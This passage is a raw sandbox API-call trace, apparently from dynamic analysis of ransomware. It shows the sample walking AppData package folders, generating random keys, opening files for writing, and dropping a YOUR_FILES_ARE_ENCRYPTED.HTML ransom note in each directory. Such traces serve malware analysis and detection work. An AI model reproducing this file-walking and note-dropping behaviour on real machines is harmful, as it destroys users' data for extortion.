nFileSizeLow=0x20000, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0118.886] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.887] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat") returned 125 [0118.887] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.887] lstrlenW (lpString=".dat") returned 4 [0118.887] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.887] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0118.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0118.887] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9b1cc602, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9b1cc602, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9b1cc602, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0118.887] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.887] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 130 [0118.887] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0118.887] lstrlenW (lpString=".LOG1") returned 5 [0118.887] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0118.887] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9b1cc602, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9b1cc602, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9b1cc602, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0118.887] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.887] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 130 [0118.887] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0118.887] lstrlenW (lpString=".LOG2") returned 5 [0118.887] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0118.887] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9b1cc602, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9b1cc602, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9b1cc602, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0118.887] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.887] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0118.887] GetProcessHeap () returned 0x600000 [0118.887] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.888] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.889] CloseHandle (hObject=0x214) returned 1 [0118.889] GetProcessHeap () returned 0x600000 [0118.889] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.889] GetProcessHeap () returned 0x600000 [0118.889] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.889] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0118.889] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.890] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData") returned 117 [0118.890] GetProcessHeap () returned 0x600000 [0118.890] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.890] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData" [0118.890] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\*" [0118.890] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.891] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.891] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 0 [0118.891] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.891] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0118.891] GetProcessHeap () returned 0x600000 [0118.891] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.891] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.892] CloseHandle (hObject=0x214) returned 1 [0118.892] GetProcessHeap () returned 0x600000 [0118.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.893] GetProcessHeap () returned 0x600000 [0118.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.893] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0118.893] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.893] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState") returned 113 [0118.893] GetProcessHeap () returned 0x600000 [0118.893] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.893] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState" [0118.893] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\*" [0118.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.893] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.893] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 0 [0118.893] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.893] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0118.893] GetProcessHeap () returned 0x600000 [0118.893] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.894] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.895] CloseHandle (hObject=0x214) returned 1 [0118.895] GetProcessHeap () returned 0x600000 [0118.895] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.895] GetProcessHeap () returned 0x600000 [0118.895] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.895] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0118.895] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.895] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0118.895] GetProcessHeap () returned 0x600000 [0118.895] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0118.897] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0118.897] CloseHandle (hObject=0x31c) returned 1 [0118.897] GetProcessHeap () returned 0x600000 [0118.898] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.898] GetProcessHeap () returned 0x600000 [0118.898] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.898] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x60629330, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x60629330, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Windows.Cortana_cw5n1h2txyewy", cAlternateFileName="MICROS~1.COR")) returned 1 [0118.898] StrStrIW (lpFirst="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.899] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy") returned 88 [0118.899] GetProcessHeap () returned 0x600000 [0118.899] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.899] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy" [0118.899] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\*" [0118.899] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607a6a92, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607a6a92, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.900] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607a6a92, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607a6a92, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0118.900] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60629330, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6e10e7a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e10e7a9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0118.900] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.900] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC") returned 91 [0118.900] GetProcessHeap () returned 0x600000 [0118.900] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.900] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC" [0118.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\*" [0118.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60629330, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6e10e7a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e10e7a9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.901] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60629330, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6e10e7a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e10e7a9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0118.901] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e10e7a9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e10e7a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e134a22, ftLastWriteTime.dwHighDateTime=0x1d7006c, 